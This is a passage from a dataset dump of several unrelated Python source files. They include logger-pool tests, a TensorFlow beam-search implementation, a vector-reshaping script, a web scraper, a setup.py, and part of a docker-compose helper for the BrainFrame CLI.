FakeProtocol()\n pool = LoggerPool()\n pool.logs[protocol.uuid] = None\n with self.assertRaises(OSError):\n pool.open_log(protocol, self.create_file())\n\n def test_no_log_when_stopped(self):\n path = self.create_file(create=False)\n protocol = FakeProtocol()\n pool = self.pool = LoggerPool()\n pool.start()\n pool.open_log(protocol, path)\n\n pool.stop()\n pool.log(protocol.uuid, STDOUT, \"\")\n self.assertEqual(pool.logs, {})\n\n def test_log(self):\n path = self.create_file(create=False)\n uuid = uuid4\n pool = self.pool = LoggerPool()\n pool.start()\n pool.open_log(uuid, path)\n\n message = urandom(16).encode(\"hex\")\n pool.log(uuid, STDOUT, message)\n self.assertEqual(list(pool.logs[uuid].messages)[0][-1], message)\n self.assertEqual(pool.logs[uuid].lines, 1)\n\n def test_flush_from_log(self):\n path = self.create_file(create=False)\n uuid = uuid4()\n pool = self.pool = LoggerPool()\n pool.max_queued_lines = 2\n pool.flush_lines = 1\n pool.start()\n pool.open_log(uuid, path)\n finished = Deferred()\n\n # log two messages\n message1 = urandom(16).encode(\"hex\")\n pool.log(uuid, STDOUT, message1)\n self.assertEqual(list(pool.logs[uuid].messages)[0][-1], message1)\n message2 = urandom(16).encode(\"hex\")\n pool.log(uuid, STDOUT, message2)\n self.assertEqual(list(pool.logs[uuid].messages)[1][-1], message2)\n self.assertEqual(pool.logs[uuid].lines, 2)\n\n # log a third message (which should cause a flush)\n message3 = urandom(16).encode(\"hex\")\n pool.log(uuid, STDOUT, message3)\n\n # Keep checking to see if the data has been flushed\n def check_for_flush():\n if list(pool.logs[uuid].messages) == []:\n num_lines = 0\n with open(path, \"rb\") as f:\n for line in f:\n num_lines += 1\n self.assertEqual(num_lines, 3)\n finished.callback(True)\n else:\n # not flushed yet maybe?\n reactor.callLater(.1, check_for_flush)\n\n reactor.callLater(.1, check_for_flush)\n\n return finished\n\n def test_flush_log_object(self):\n path = self.create_file(create=False)\n uuid = uuid4()\n pool = self.pool = LoggerPool()\n pool.flush_lines = 1\n pool.start()\n pool.open_log(uuid, path)\n\n # log two messages\n message1 = urandom(16).encode(\"hex\")\n pool.log(uuid, STDOUT, message1)\n self.assertEqual(list(pool.logs[uuid].messages)[0][-1], message1)\n message2 = urandom(16).encode(\"hex\")\n pool.log(uuid, STDOUT, message2)\n self.assertEqual(\n list(pool.logs[uuid].messages)[1][-1], message2)\n self.assertEqual(pool.logs[uuid].lines, 2)\n\n pool.flush(pool.logs[uuid])\n self.assertEqual(list(pool.logs[uuid].messages), [])\n num_lines = 0\n with open(path, \"rb\") as f:\n for line in f:\n num_lines += 1\n self.assertEqual(num_lines, 2)\n\n def test_stop(self):\n path = self.create_file(create=False)\n uuid = uuid4()\n pool = self.pool = LoggerPool()\n pool.start()\n pool.open_log(uuid, path)\n\n # log two messages\n message1 = urandom(16).encode(\"hex\")\n pool.log(uuid, STDOUT, message1)\n self.assertEqual(list(pool.logs[uuid].messages)[0][-1], message1)\n message2 = urandom(16).encode(\"hex\")\n pool.log(uuid, STDOUT, message2)\n self.assertEqual(list(pool.logs[uuid].messages)[1][-1], message2)\n self.assertEqual(pool.logs[uuid].lines, 2)\n\n log = pool.logs[uuid]\n self.assertFalse(pool.stopped)\n pool.stop()\n self.assertTrue(pool.stopped)\n self.assertNotIn(uuid, pool.logs)\n self.assertTrue(log.file.closed)\n\n def test_start(self):\n existing_entries = reactor._eventTriggers[\"shutdown\"].before[:]\n pool = self.pool = LoggerPool()\n pool.start()\n self.assertTrue(pool.started)\n\n for entry in reactor._eventTriggers[\"shutdown\"].before:\n if entry not in existing_entries and entry[0] == pool.stop:\n break\n else:\n self.fail(\"Shutdown even trigger not added\")\n","sub_path":"tests/test_jobtypes/test_core_log.py","file_name":"test_core_log.py","file_ext":"py","file_size_in_byte":8144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"351300428","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/svpino/dev/tensorflow-object-detection-sagemaker/todl/tensorflow-object-detection/official/nlp/transformer/beam_search_v1.py\n# Compiled at: 2020-04-05 19:50:57\n# Size of source mod 2**32: 27301 bytes\n\"\"\"Beam search to find the translated sequence with the highest probability.\n\nSource implementation from Tensor2Tensor:\nhttps://github.com/tensorflow/tensor2tensor/blob/master/tensor2tensor/utils/beam_search.py\n\"\"\"\nimport numpy as np\nimport tensorflow.compat.v1 as tf\nfrom tensorflow.python.util import nest\n\ndef inf(dtype):\n \"\"\"Returns a value close to infinity, but is still finite in `dtype`.\n\n This is useful to get a very large value that is still zero when multiplied by\n zero. The floating-point \"Inf\" value is NaN when multiplied by zero.\n\n Args:\n dtype: A dtype. The returned value will be finite when casted to this dtype.\n\n Returns:\n A very large value.\n \"\"\"\n if dtype == 'float32' or dtype == 'bfloat16':\n return 10000000.0\n if dtype == 'float16':\n return np.finfo(np.float16).max\n raise AssertionError('Invalid dtype: %s' % dtype)\n\n\nclass _StateKeys(object):\n __doc__ = 'Keys to dictionary storing the state of the beam search loop.'\n CUR_INDEX = 'CUR_INDEX'\n ALIVE_SEQ = 'ALIVE_SEQ'\n ALIVE_LOG_PROBS = 'ALIVE_LOG_PROBS'\n ALIVE_CACHE = 'ALIVE_CACHE'\n FINISHED_SEQ = 'FINISHED_SEQ'\n FINISHED_SCORES = 'FINISHED_SCORES'\n FINISHED_FLAGS = 'FINISHED_FLAGS'\n\n\nclass SequenceBeamSearch(object):\n __doc__ = 'Implementation of beam search loop.'\n\n def __init__(self, symbols_to_logits_fn, vocab_size, batch_size, beam_size, alpha, max_decode_length, eos_id, padded_decode, dtype=tf.float32):\n \"\"\"Initialize sequence beam search.\n\n Args:\n symbols_to_logits_fn: A function to provide logits, which is the\n interface to the Transformer model. The passed in arguments are:\n ids -> A tensor with shape [batch_size * beam_size, index].\n index -> A scalar.\n cache -> A nested dictionary of tensors [batch_size * beam_size, ...].\n The function must return a tuple of logits and the updated cache:\n logits -> A tensor with shape [batch * beam_size, vocab_size].\n updated cache -> A nested dictionary with the same structure as the\n input cache.\n vocab_size: An integer, the size of the vocabulary, used for topk\n computation.\n batch_size: An integer, the decode batch size.\n beam_size: An integer, number of beams for beam search.\n alpha: A float, defining the strength of length normalization.\n max_decode_length: An integer, the maximum number of steps to decode\n a sequence.\n eos_id: An integer. ID of end of sentence token.\n padded_decode: A bool, indicating if max_sequence_length padding is used\n for beam search.\n dtype: A tensorflow data type used for score computation. The default is\n tf.float32.\n \"\"\"\n self.symbols_to_logits_fn = symbols_to_logits_fn\n self.vocab_size = vocab_size\n self.batch_size = batch_size\n self.beam_size = beam_size\n self.alpha = alpha\n self.max_decode_length = max_decode_length\n self.eos_id = eos_id\n self.padded_decode = padded_decode\n self.dtype = tf.as_dtype(dtype)\n\n def search(self, initial_ids, initial_cache):\n \"\"\"Beam search for sequences with highest scores.\"\"\"\n state, state_shapes = self._create_initial_state(initial_ids, initial_cache)\n finished_state = tf.while_loop((self._continue_search),\n (self._search_step), loop_vars=[state], shape_invariants=[\n state_shapes],\n parallel_iterations=1,\n back_prop=False)\n finished_state = finished_state[0]\n alive_seq = finished_state[_StateKeys.ALIVE_SEQ]\n alive_log_probs = finished_state[_StateKeys.ALIVE_LOG_PROBS]\n finished_seq = finished_state[_StateKeys.FINISHED_SEQ]\n finished_scores = finished_state[_StateKeys.FINISHED_SCORES]\n finished_flags = finished_state[_StateKeys.FINISHED_FLAGS]\n finished_seq = tf.where(tf.reduce_any(finished_flags, 1), finished_seq, alive_seq)\n finished_scores = tf.where(tf.reduce_any(finished_flags, 1), finished_scores, alive_log_probs)\n return (finished_seq, finished_scores)\n\n def _create_initial_state(self, initial_ids, initial_cache):\n \"\"\"Return initial state dictionary and its shape invariants.\n\n Args:\n initial_ids: initial ids to pass into the symbols_to_logits_fn.\n int tensor with shape [batch_size, 1]\n initial_cache: dictionary storing values to be passed into the\n symbols_to_logits_fn.\n\n Returns:\n state and shape invariant dictionaries with keys from _StateKeys\n \"\"\"\n for key, value in initial_cache.items():\n for inner_value in nest.flatten(value):\n if inner_value.dtype != self.dtype:\n raise TypeError(\"initial_cache element for key '%s' has dtype %s that does not match SequenceBeamSearch's dtype of %s. Value: %s\" % (\n key, value.dtype.name, self.dtype.name, inner_value))\n\n cur_index = tf.constant(0)\n alive_seq = _expand_to_beam_size(initial_ids, self.beam_size)\n alive_seq = tf.expand_dims(alive_seq, axis=2)\n if self.padded_decode:\n alive_seq = tf.tile(alive_seq, [1, 1, self.max_decode_length + 1])\n else:\n initial_log_probs = tf.constant([\n [\n 0.0] + [-float('inf')] * (self.beam_size - 1)],\n dtype=(self.dtype))\n alive_log_probs = tf.tile(initial_log_probs, [self.batch_size, 1])\n alive_cache = nest.map_structure(lambda t: _expand_to_beam_size(t, self.beam_size), initial_cache)\n finished_seq = tf.zeros(tf.shape(alive_seq), tf.int32)\n finished_scores = tf.ones([self.batch_size, self.beam_size], dtype=(self.dtype)) * -inf(self.dtype)\n finished_flags = tf.zeros([self.batch_size, self.beam_size], tf.bool)\n state = {_StateKeys.CUR_INDEX: cur_index, \n _StateKeys.ALIVE_SEQ: alive_seq, \n _StateKeys.ALIVE_LOG_PROBS: alive_log_probs, \n _StateKeys.ALIVE_CACHE: alive_cache, \n _StateKeys.FINISHED_SEQ: finished_seq, \n _StateKeys.FINISHED_SCORES: finished_scores, \n _StateKeys.FINISHED_FLAGS: finished_flags}\n if self.padded_decode:\n state_shape_invariants = {_StateKeys.CUR_INDEX: tf.TensorShape([]), \n \n _StateKeys.ALIVE_SEQ: tf.TensorShape([\n self.batch_size, self.beam_size,\n self.max_decode_length + 1]), \n \n _StateKeys.ALIVE_LOG_PROBS: tf.TensorShape([self.batch_size, self.beam_size]), \n \n _StateKeys.ALIVE_CACHE: nest.map_structure(_get_shape, alive_cache), \n \n _StateKeys.FINISHED_SEQ: tf.TensorShape([\n self.batch_size, self.beam_size,\n self.max_decode_length + 1]), \n \n _StateKeys.FINISHED_SCORES: tf.TensorShape([self.batch_size, self.beam_size]), \n \n _StateKeys.FINISHED_FLAGS: tf.TensorShape([self.batch_size, self.beam_size])}\n else:\n state_shape_invariants = {_StateKeys.CUR_INDEX: tf.TensorShape([]), \n \n _StateKeys.ALIVE_SEQ: tf.TensorShape([None, self.beam_size, None]), \n \n _StateKeys.ALIVE_LOG_PROBS: tf.TensorShape([None, self.beam_size]), \n \n _StateKeys.ALIVE_CACHE: nest.map_structure(_get_shape_keep_last_dim, alive_cache), \n \n _StateKeys.FINISHED_SEQ: tf.TensorShape([None, self.beam_size, None]), \n \n _StateKeys.FINISHED_SCORES: tf.TensorShape([None, self.beam_size]), \n \n _StateKeys.FINISHED_FLAGS: tf.TensorShape([None, self.beam_size])}\n return (state, state_shape_invariants)\n\n def _continue_search(self, state):\n \"\"\"Return whether to continue the search loop.\n\n The loops should terminate when\n 1) when decode length has been reached, or\n 2) when the worst score in the finished sequences is better than the best\n score in the alive sequences (i.e. the finished sequences are provably\n unchanging)\n\n Args:\n state: A dictionary with the current loop state.\n\n Returns:\n Bool tensor with value True if loop should continue, False if loop should\n terminate.\n \"\"\"\n i = state[_StateKeys.CUR_INDEX]\n alive_log_probs = state[_StateKeys.ALIVE_LOG_PROBS]\n finished_scores = state[_StateKeys.FINISHED_SCORES]\n finished_flags = state[_StateKeys.FINISHED_FLAGS]\n not_at_max_decode_length = tf.less(i, self.max_decode_length)\n max_length_norm = _length_normalization((self.alpha), (self.max_decode_length), dtype=(self.dtype))\n best_alive_scores = alive_log_probs[:, 0] / max_length_norm\n finished_scores *= tf.cast(finished_flags, self.dtype)\n lowest_finished_scores = tf.reduce_min(finished_scores, axis=1)\n finished_batches = tf.reduce_any(finished_flags, 1)\n lowest_finished_scores += (1.0 - tf.cast(finished_batches, self.dtype)) * -inf(self.dtype)\n worst_finished_score_better_than_best_alive_score = tf.reduce_all(tf.greater(lowest_finished_scores, best_alive_scores))\n return tf.logical_and(not_at_max_decode_length, tf.logical_not(worst_finished_score_better_than_best_alive_score))\n\n def _search_step(self, state):\n \"\"\"Beam search loop body.\n\n Grow alive sequences by a single ID. Sequences that have reached the EOS\n token are marked as finished. The alive and finished sequences with the\n highest log probabilities and scores are returned.\n\n A sequence's finished score is calculating by dividing the log probability\n by the length normalization factor. Without length normalization, the\n search is more likely to return shorter sequences.\n\n Args:\n state: A dictionary with the current loop state.\n\n Returns:\n new state dictionary.\n \"\"\"\n new_seq, new_log_probs, topk_ids, new_cache = self._grow_alive_seq(state)\n new_finished_flags = tf.equal(topk_ids, self.eos_id)\n alive_state = self._get_new_alive_state(new_seq, new_log_probs, new_finished_flags, new_cache)\n finished_state = self._get_new_finished_state(state, new_seq, new_log_probs, new_finished_flags)\n new_state = {_StateKeys.CUR_INDEX: state[_StateKeys.CUR_INDEX] + 1}\n new_state.update(alive_state)\n new_state.update(finished_state)\n return [new_state]\n\n def _grow_alive_seq(self, state):\n \"\"\"Grow alive sequences by one token, and collect top 2*beam_size sequences.\n\n 2*beam_size sequences are collected because some sequences may have reached\n the EOS token. 2*beam_size ensures that at least beam_size sequences are\n still alive.\n\n Args:\n state: A dictionary with the current loop state.\n Returns:\n Tuple of\n (Top 2*beam_size sequences [batch_size, 2 * beam_size, cur_index + 1],\n Scores of returned sequences [batch_size, 2 * beam_size],\n New alive cache, for each of the 2 * beam_size sequences)\n \"\"\"\n i = state[_StateKeys.CUR_INDEX]\n alive_seq = state[_StateKeys.ALIVE_SEQ]\n alive_log_probs = state[_StateKeys.ALIVE_LOG_PROBS]\n alive_cache = state[_StateKeys.ALIVE_CACHE]\n beams_to_keep = 2 * self.beam_size\n if self.padded_decode:\n flat_ids = tf.reshape(tf.slice(alive_seq, [0, 0, i], [self.batch_size, self.beam_size, 1]), [\n self.batch_size * self.beam_size, -1])\n else:\n flat_ids = _flatten_beam_dim(alive_seq)\n flat_cache = nest.map_structure(_flatten_beam_dim, alive_cache)\n flat_logits, flat_cache = self.symbols_to_logits_fn(flat_ids, i, flat_cache)\n logits = _unflatten_beam_dim(flat_logits, self.batch_size, self.beam_size)\n new_cache = nest.map_structure(lambda t: _unflatten_beam_dim(t, self.batch_size, self.beam_size), flat_cache)\n candidate_log_probs = _log_prob_from_logits(logits)\n log_probs = candidate_log_probs + tf.expand_dims(alive_log_probs, axis=2)\n flat_log_probs = tf.reshape(log_probs, [\n -1, self.beam_size * self.vocab_size])\n topk_log_probs, topk_indices = tf.nn.top_k(flat_log_probs, k=beams_to_keep)\n topk_beam_indices = topk_indices // self.vocab_size\n topk_seq, new_cache = _gather_beams([\n alive_seq, new_cache], topk_beam_indices, self.batch_size, beams_to_keep)\n topk_ids = topk_indices % self.vocab_size\n if self.padded_decode:\n topk_seq = tf.transpose(topk_seq, perm=[2, 0, 1])\n topk_seq = tf.tensor_scatter_nd_update(topk_seq, [[i + 1]], tf.expand_dims(topk_ids, axis=0))\n topk_seq = tf.transpose(topk_seq, perm=[1, 2, 0])\n else:\n topk_seq = tf.concat([topk_seq, tf.expand_dims(topk_ids, axis=2)], axis=2)\n return (\n topk_seq, topk_log_probs, topk_ids, new_cache)\n\n def _get_new_alive_state(self, new_seq, new_log_probs, new_finished_flags, new_cache):\n \"\"\"Gather the top k sequences that are still alive.\n\n Args:\n new_seq: New sequences generated by growing the current alive sequences\n int32 tensor with shape [batch_size, 2 * beam_size, cur_index + 1]\n new_log_probs: Log probabilities of new sequences float32 tensor with\n shape [batch_size, beam_size]\n new_finished_flags: A boolean Tensor indicates which sequences are live\n inside the beam.\n new_cache: Dict of cached values for each sequence.\n\n Returns:\n Dictionary with alive keys from _StateKeys:\n {Top beam_size sequences that are still alive (don't end with eos_id)\n Log probabilities of top alive sequences\n Dict cache storing decoder states for top alive sequences}\n \"\"\"\n new_log_probs += tf.cast(new_finished_flags, self.dtype) * -inf(self.dtype)\n top_alive_seq, top_alive_log_probs, top_alive_cache = _gather_topk_beams([\n new_seq, new_log_probs, new_cache], new_log_probs, self.batch_size, self.beam_size)\n return {_StateKeys.ALIVE_SEQ: top_alive_seq, \n _StateKeys.ALIVE_LOG_PROBS: top_alive_log_probs, \n _StateKeys.ALIVE_CACHE: top_alive_cache}\n\n def _get_new_finished_state(self, state, new_seq, new_log_probs, new_finished_flags):\n \"\"\"Combine new and old finished sequences, and gather the top k sequences.\n\n Args:\n state: A dictionary with the current loop state.\n new_seq: New sequences generated by growing the current alive sequences\n int32 tensor with shape [batch_size, beam_size, i + 1]\n new_log_probs: Log probabilities of new sequences float32 tensor with\n shape [batch_size, beam_size]\n new_finished_flags: A boolean Tensor indicates which sequences are live\n inside the beam.\n\n Returns:\n Dictionary with finished keys from _StateKeys:\n {Top beam_size finished sequences based on score,\n Scores of finished sequences,\n Finished flags of finished sequences}\n \"\"\"\n i = state[_StateKeys.CUR_INDEX]\n finished_seq = state[_StateKeys.FINISHED_SEQ]\n finished_scores = state[_StateKeys.FINISHED_SCORES]\n finished_flags = state[_StateKeys.FINISHED_FLAGS]\n if not self.padded_decode:\n finished_seq = tf.concat([\n finished_seq,\n tf.zeros([self.batch_size, self.beam_size, 1], tf.int32)],\n axis=2)\n length_norm = _length_normalization((self.alpha), (i + 1), dtype=(self.dtype))\n new_scores = new_log_probs / length_norm\n new_scores += (1.0 - tf.cast(new_finished_flags, self.dtype)) * -inf(self.dtype)\n finished_seq = tf.concat([finished_seq, new_seq], axis=1)\n finished_scores = tf.concat([finished_scores, new_scores], axis=1)\n finished_flags = tf.concat([finished_flags, new_finished_flags], axis=1)\n top_finished_seq, top_finished_scores, top_finished_flags = _gather_topk_beams([finished_seq, finished_scores, finished_flags], finished_scores, self.batch_size, self.beam_size)\n return {_StateKeys.FINISHED_SEQ: top_finished_seq, \n _StateKeys.FINISHED_SCORES: top_finished_scores, \n _StateKeys.FINISHED_FLAGS: top_finished_flags}\n\n\ndef sequence_beam_search(symbols_to_logits_fn, initial_ids, initial_cache, vocab_size, beam_size, alpha, max_decode_length, eos_id, padded_decode=False):\n \"\"\"Search for sequence of subtoken ids with the largest probability.\n\n Args:\n symbols_to_logits_fn: A function that takes in ids, index, and cache as\n arguments. The passed in arguments will have shape:\n ids -> A tensor with shape [batch_size * beam_size, index].\n index -> A scalar.\n cache -> A nested dictionary of tensors [batch_size * beam_size, ...].\n The function must return a tuple of logits and new cache:\n logits -> A tensor with shape [batch * beam_size, vocab_size].\n new cache -> A nested dictionary with the same shape/structure as the\n inputted cache.\n initial_ids: An int32 tensor with shape [batch_size]. Starting ids for\n each batch item.\n initial_cache: A dictionary, containing starting decoder variables\n information.\n vocab_size: An integer, the size of the vocabulary, used for topk\n computation.\n beam_size: An integer, the number of beams.\n alpha: A float, defining the strength of length normalization.\n max_decode_length: An integer, the maximum length to decoded a sequence.\n eos_id: An integer, ID of eos token, used to determine when a sequence has\n finished.\n padded_decode: A bool, indicating if max_sequence_length padding is used\n for beam search.\n\n Returns:\n Top decoded sequences [batch_size, beam_size, max_decode_length]\n sequence scores [batch_size, beam_size]\n \"\"\"\n batch_size = initial_ids.shape.as_list()[0] if padded_decode else tf.shape(initial_ids)[0]\n sbs = SequenceBeamSearch(symbols_to_logits_fn, vocab_size, batch_size, beam_size, alpha, max_decode_length, eos_id, padded_decode)\n return sbs.search(initial_ids, initial_cache)\n\n\ndef _log_prob_from_logits(logits):\n return logits - tf.reduce_logsumexp(logits, axis=2, keepdims=True)\n\n\ndef _length_normalization(alpha, length, dtype=tf.float32):\n \"\"\"Return length normalization factor.\"\"\"\n return tf.pow((5.0 + tf.cast(length, dtype)) / 6.0, alpha)\n\n\ndef _expand_to_beam_size(tensor, beam_size):\n \"\"\"Tiles a given tensor by beam_size.\n\n Args:\n tensor: tensor to tile [batch_size, ...]\n beam_size: How much to tile the tensor by.\n\n Returns:\n Tiled tensor [batch_size, beam_size, ...]\n \"\"\"\n tensor = tf.expand_dims(tensor, axis=1)\n tile_dims = [1] * tensor.shape.ndims\n tile_dims[1] = beam_size\n return tf.tile(tensor, tile_dims)\n\n\ndef _shape_list(tensor):\n \"\"\"Return a list of the tensor's shape, and ensure no None values in list.\"\"\"\n shape = tensor.get_shape().as_list()\n dynamic_shape = tf.shape(tensor)\n for i in range(len(shape)):\n if shape[i] is None:\n shape[i] = dynamic_shape[i]\n\n return shape\n\n\ndef _get_shape_keep_last_dim(tensor):\n shape_list = _shape_list(tensor)\n for i in range(len(shape_list) - 1):\n shape_list[i] = None\n\n if isinstance(shape_list[(-1)], tf.Tensor):\n shape_list[-1] = None\n return tf.TensorShape(shape_list)\n\n\ndef _get_shape(tensor):\n \"\"\"Return the shape of the input tensor.\"\"\"\n return tf.TensorShape(_shape_list(tensor))\n\n\ndef _flatten_beam_dim(tensor):\n \"\"\"Reshapes first two dimensions in to single dimension.\n\n Args:\n tensor: Tensor to reshape of shape [A, B, ...]\n\n Returns:\n Reshaped tensor of shape [A*B, ...]\n \"\"\"\n shape = _shape_list(tensor)\n shape[0] *= shape[1]\n shape.pop(1)\n return tf.reshape(tensor, shape)\n\n\ndef _unflatten_beam_dim(tensor, batch_size, beam_size):\n \"\"\"Reshapes first dimension back to [batch_size, beam_size].\n\n Args:\n tensor: Tensor to reshape of shape [batch_size*beam_size, ...]\n batch_size: Tensor, original batch size.\n beam_size: int, original beam size.\n\n Returns:\n Reshaped tensor of shape [batch_size, beam_size, ...]\n \"\"\"\n shape = _shape_list(tensor)\n new_shape = [batch_size, beam_size] + shape[1:]\n return tf.reshape(tensor, new_shape)\n\n\ndef _gather_beams(nested, beam_indices, batch_size, new_beam_size):\n \"\"\"Gather beams from nested structure of tensors.\n\n Each tensor in nested represents a batch of beams, where beam refers to a\n single search state (beam search involves searching through multiple states\n in parallel).\n\n This function is used to gather the top beams, specified by\n beam_indices, from the nested tensors.\n\n Args:\n nested: Nested structure (tensor, list, tuple or dict) containing tensors\n with shape [batch_size, beam_size, ...].\n beam_indices: int32 tensor with shape [batch_size, new_beam_size]. Each\n value in beam_indices must be between [0, beam_size), and are not\n necessarily unique.\n batch_size: int size of batch\n new_beam_size: int number of beams to be pulled from the nested tensors.\n\n Returns:\n Nested structure containing tensors with shape\n [batch_size, new_beam_size, ...]\n \"\"\"\n batch_pos = tf.range(batch_size * new_beam_size) // new_beam_size\n batch_pos = tf.reshape(batch_pos, [batch_size, new_beam_size])\n coordinates = tf.stack([batch_pos, beam_indices], axis=2)\n return nest.map_structure(lambda state: tf.gather_nd(state, coordinates), nested)\n\n\ndef _gather_topk_beams(nested, score_or_log_prob, batch_size, beam_size):\n \"\"\"Gather top beams from nested structure.\"\"\"\n _, topk_indexes = tf.nn.top_k(score_or_log_prob, k=beam_size)\n return _gather_beams(nested, topk_indexes, batch_size, beam_size)","sub_path":"pycfiles/todl-0.1.1.tar/beam_search_v1.cpython-37.py","file_name":"beam_search_v1.cpython-37.py","file_ext":"py","file_size_in_byte":22371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"378449128","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Aug 19 20:56:23 2018\n\n@author: isaac\n\"\"\"\nimport numpy as np\nimport pickle\nimport os\nimport time\n\n\npath = r\"C:\\Users\\isaac\\Documents\\GitHub\\100-Days-of-ML-Code\\moods\"\nos.chdir(path)\nprint(\"Opening pickle file\")\nwith open(\"vectorizedsentences.txt\",'rb') as fp:\n x = pickle.load(fp)\n\nformatted_x = []\nprint(\"Converting to long...\")\n\n#@vectorize(['float32(float32,float32)'], target = 'gpu')\ndef matricer(x):\n formatted_x = []\n i=1\n for matrix in x:\n print(\"Converting matrix \",i,\" out of \",len(x))\n i+=1\n \n for vector in matrix:\n try:\n \n for entry in vector:\n \n formatted_x.append(entry)\n #print(\"Conversion success.\")\n except TypeError:\n #print(\"Error passed\")\n pass\n time.sleep(0.01)\n# longm.append(longv)\n vector_of_all = np.array(formatted_x).reshape([-1,300,300,1])\n print(\"Done\")\n\n np.save(\"vectored_data.npy\",vector_of_all)\n print(\"File saved.\")\n return vector_of_all\nms = matricer(x)\nprint(ms.shape)","sub_path":"dataMatricer.py","file_name":"dataMatricer.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"204420675","text":"import requests\nfrom bs4 import BeautifulSoup\n\nURL_AUTOMOVEIS = 'https://django-anuncios.solyd.com.br/automoveis/'\n\n\ndef buscar(url):\n try:\n resposta = requests.get(url)\n if resposta.status_code == 200:\n return resposta.text\n else:\n print('Erro ao fazer requisição!!')\n except Exception as error:\n print('Erro ao fazer requisição!!')\n print(error)\n\n\ndef parsing(resposta_html):\n try:\n soup = BeautifulSoup(resposta_html, 'html.parser')\n return soup\n except Exception as error:\n print('Erro ao fazer parsing do HTML!')\n print(error)\n\n\ndef encontrar_links(soup):\n cards_pai = soup.find('div', class_=\"ui three doubling link cards\")\n cards = cards_pai.find_all('a')\n links = []\n for card in cards:\n link = card['href']\n links.append(link)\n\n return links\n\n\nresposta = buscar(URL_AUTOMOVEIS)\nif resposta:\n soup = parsing(resposta)\n if soup:\n links = encontrar_links(soup)\n print(links)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"236677045","text":"# -*- coding: utf-8 -*-\nimport os\nimport sys\nimport re\ntry:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\n# reading pymlconf version (same way sqlalchemy does)\nwith open(os.path.join(os.path.dirname(__file__), 'pymlconf', '__init__.py')) as v_file:\n package_version = re.compile(r\".*__version__ = '(.*?)'\", re.S).match(v_file.read()).group(1)\n\ndependencies = ['pyyaml >= 3.10']\n\n# checking for current python version to add legacy `ordereddict` module into dependencies\nif sys.version_info < (2, 7):\n dependencies.append('ordereddict')\n\n\ndef read(filename):\n return open(os.path.join(os.path.dirname(__file__), filename)).read()\n\nsetup(\n name=\"pymlconf\",\n version=package_version,\n author=\"Vahid Mardani\",\n author_email=\"vahid.mardani@gmail.com\",\n url=\"http://github.com/pylover/pymlconf\",\n description=\"Python high level configuration library\",\n maintainer=\"Vahid Mardani\",\n maintainer_email=\"vahid.mardani@gmail.com\",\n packages=[\"pymlconf\", \"pymlconf.tests\"],\n package_dir={'pymlconf': 'pymlconf'},\n package_data={'pymlconf': ['tests/conf/*', 'tests/files/*']},\n platforms=[\"any\"],\n long_description=read('README.rst'),\n install_requires=dependencies,\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"License :: OSI Approved :: MIT License\",\n 'Intended Audience :: Developers',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Topic :: Software Development :: Libraries'\n ],\n test_suite='pymlconf.tests',\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"373039131","text":"import os\nimport subprocess\nfrom pathlib import Path\nfrom typing import List, TextIO, Tuple, cast\n\nimport i18n\nimport yaml\n\nfrom . import env_vars, os_utils, print_utils\n\n# The URL to the docker-compose.yml\nBRAINFRAME_DOCKER_COMPOSE_URL = \"https://{subdomain}aotu.ai/releases/brainframe/{version}/docker-compose.yml\"\n# The URL to the latest tag, which is just a file containing the latest version\n# as a string\nBRAINFRAME_LATEST_TAG_URL = (\n \"https://{subdomain}aotu.ai/releases/brainframe/latest\"\n)\n\n\ndef assert_installed(install_path: Path) -> None:\n compose_path = install_path / \"docker-compose.yml\"\n\n if not compose_path.is_file():\n print_utils.fail_translate(\n \"general.brainframe-must-be-installed\",\n install_env_var=env_vars.install_path.name,\n )\n\n\ndef run(install_path: Path, commands: List[str]) -> None:\n _assert_has_docker_permissions()\n\n compose_path = install_path / \"docker-compose.yml\"\n\n full_command = [\"docker-compose\", \"--file\", str(compose_path)]\n\n # Provide the override file if it exists\n compose_override_path = install_path / \"docker-compose.override.yml\"\n if compose_override_path.is_file():\n full_command += [\"--file\", str(compose_override_path)]\n\n # Provide the .env file if it exists\n env_path = install_path / \".env\"\n if env_path.is_file():\n full_command += [\"--env-file\", str(env_path)]\n\n os_utils.run(full_command + commands)\n\n\ndef download(target: Path, version: str = \"latest\") -> None:\n _assert_has_write_permissions(target.parent)\n\n subdomain, auth_flags, version = check_download_version(version=version)\n\n url = BRAINFRAME_DOCKER_COMPOSE_URL.format(\n subdomain=subdomain, version=version\n )\n os_utils.run(\n [\"curl\", \"-o\", str(target), \"--fail\", \"--location\", url] + auth_flags,\n )\n\n if os_utils.is_root():\n # Fix the permissions of the docker-compose.yml so that the BrainFrame\n # group can edit it\n os_utils.give_brainframe_group_rw_access([target])\n\n\ndef check_download_version(\n version: str = \"latest\",\n) -> Tuple[str, List[str], str]:\n subdomain = \"\"\n auth_flags = []\n\n # Add the flags to authenticate with staging if the user wants to download\n # from there\n if env_vars.is_staging.is_set():\n subdomain = \"staging.\"\n\n username = env_vars.staging_username.get()\n password = env_vars.staging_password.get()\n if username is None or password is None:\n print_utils.fail_translate(\n \"general.staging-missing-credentials\",\n username_env_var=env_vars.staging_username.name,\n password_env_var=env_vars.staging_password.name,\n )\n\n auth_flags = [\"--user\", f\"{username}:{password}\"]\n\n if version == \"latest\":\n # Check what the latest version is\n url = BRAINFRAME_LATEST_TAG_URL.format(subdomain=subdomain)\n result = os_utils.run(\n [\"curl\", \"--fail\", \"-s\", 